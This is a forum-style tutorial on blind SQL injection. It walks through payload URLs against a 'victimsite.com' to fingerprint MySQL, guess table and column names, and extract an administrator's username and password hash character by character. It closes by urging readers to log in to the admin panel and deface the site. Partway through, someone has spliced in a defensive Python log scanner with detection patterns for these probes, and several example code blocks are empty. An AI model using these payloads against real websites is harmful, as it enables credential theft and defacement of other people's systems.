Advanced SQL Injection Part 2: Blind SQLi

Hello everyone, tonight I'm gonna teach you another method of SQL injection called Blind SQLi. Blind SQLi is used when a web application is vulnerable to SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data, but it will display differently depending on the result of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered.

Note that this is not a tutorial for noobs. If you don't know much about SQLi, learn it from my previous tutorial first.


So here we go...


Step 1: Test for vulnerability

So you have a site, let's say:
Code:

just like normal MySQL injection,

but for blind you put:
Code:

If you see any text from the page missing, or an error message like "invalid id", "db_error select * from xxxx@localhost", "call line /" or anything like that, then it's vuln. This works because 1=2 is always false. If instead it was:

Code:
then you would get the normal page, because 1=1 is always true.


Step 2: MySQL version

To find the MySQL version you need to do this query:
Code:
www.victimsite.com/index.php?id=1 and substring(@@version,1,1)=4

If the page comes back true then the version is 4; if not, try
Code:
www.victimsite.com/index.php?id=1 and substring(@@version,1,1)=5

If it comes back true then it's version 5.


Step 3: Fuzzing tables and columns

To find the table name you need to guess it, so here is the query:
Code:
www.victimsite.com/index.php?id=1 and (SELECT 1 from admin limit 0,1)=1

Here I have guessed the table admin. If the page loads true then the table exists. E.g., say the real table name is administrator and we try
Code:
(SELECT 1 from users limit 0,1)=1

then it will return with an error, a.k.a. false, but if we did
Code:
(SELECT 1 from administrator limit 0,1)=1

then it would not error, a.k.a. true.

Now for the column. So the table is administrator (we found that by fuzzing); now we need the column name, and we fuzz it by
Code:
www.victimsite.com/index.php?id=1 and (SELECT substring(concat(1,password),1,1) from administrator limit 0,1)=1

If the column password exists then it won't error: concat(1,password) always starts with '1', so the comparison is true whenever the column is there, and the query errors out when it isn't. You get my drift...

Step 4: Extracting the password with ascii()

So now we have the table/column we need to extract. As you know it won't just pop up on the screen, so we will need to use the ascii() function and test the string one character at a time:
Code:
www.victimsite.com/index.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from administrator where userid=2),1,1))>99

If this returns true then you need to go higher:
Code:
index.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from administrator where userid=2),1,1))>103

If this errors then it's not greater than 103, but we already know it's greater than 99. Now try lower:
Code:
index.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from administrator where userid=2),1,1))>101

Error, so it's greater than 99 but not greater than 101. Lower again:
Code:
index.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from administrator where userid=2),1,1))>100

Error, so it's greater than 99 but not greater than 100, making it 100. The first character is 100, which if you put it into an ASCII converter you will see is the letter d. Now you need to find the next character:
Code:
index.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from administrator where userid=2),2,1))>60

Notice how I did ),2,1))>60 instead of ,1,1): this tests the second character. Keep extracting characters until you get an error (past the end of the string substring() returns '' and ascii('') is 0, so every comparison fails from there on), and then you will have the hash / password.
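From the defending side, and not part of the original post: a small Python scanner that picks the probes from steps 1 to 4 out of web server access logs and groups hits per client IP, because the one-request-per-character loop above shows up as a burst of near-identical requests from a single source. The log lines are constructed samples and the signature names are my own.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Signatures for the boolean-based blind probes walked through in steps 1-4.
SIGNATURES = {
    "boolean-probe": re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),            # and 1=1 / and 1=2
    "version-fingerprint": re.compile(r"substring\s*\(\s*@@version", re.I),  # step 2
    "table-guess": re.compile(r"\(\s*select\s+1\s+from\s+\w+\s+limit", re.I),  # step 3
    "char-extraction": re.compile(r"ascii\s*\(\s*substring\s*\(", re.I),     # step 4
}

# Combined log format: client ip, identd, user, [timestamp], "METHOD target HTTP/x.y" ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(target: str) -> set:
    """Return the signature names matching a request target (URL-decoded first)."""
    decoded = unquote_plus(target)
    return {name for name, pat in SIGNATURES.items() if pat.search(decoded)}

def scan(log_lines):
    """Per client IP: number of flagged requests and the set of signatures seen.
    Many 'char-extraction' hits from one IP is the tell-tale of step 4."""
    report = defaultdict(lambda: {"hits": 0, "sigs": set()})
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        sigs = classify(target)
        if sigs:
            report[ip]["hits"] += 1
            report[ip]["sigs"] |= sigs
    return dict(report)

# Constructed sample log lines (not real traffic), URL-encoded as a browser sends them.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?id=1%20and%201=2 HTTP/1.1" 200 3011',
    '198.51.100.7 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?id=1%20and%20substring(@@version,1,1)=5 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Oct/2023:13:55:42 +0000] "GET /index.php?id=1%20and%20(SELECT%201%20from%20administrator%20limit%200,1)=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Oct/2023:13:55:43 +0000] "GET /index.php?id=1%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20administrator%20where%20userid=2),1,1))%3E99 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Oct/2023:13:55:44 +0000] "GET /index.php?id=1%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20administrator%20where%20userid=2),1,1))%3E103 HTTP/1.1" 200 3011',
]

if __name__ == "__main__":
    for ip, info in scan(SAMPLE_LOG).items():
        print(ip, info["hits"], sorted(info["sigs"]))
```

Only the 198.51.100.7 lines are flagged; the plain request from 203.0.113.5 never appears in the report.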

Now you've got the user's password. Find the admin panel and deface the site just like before.

Happy Hacking :)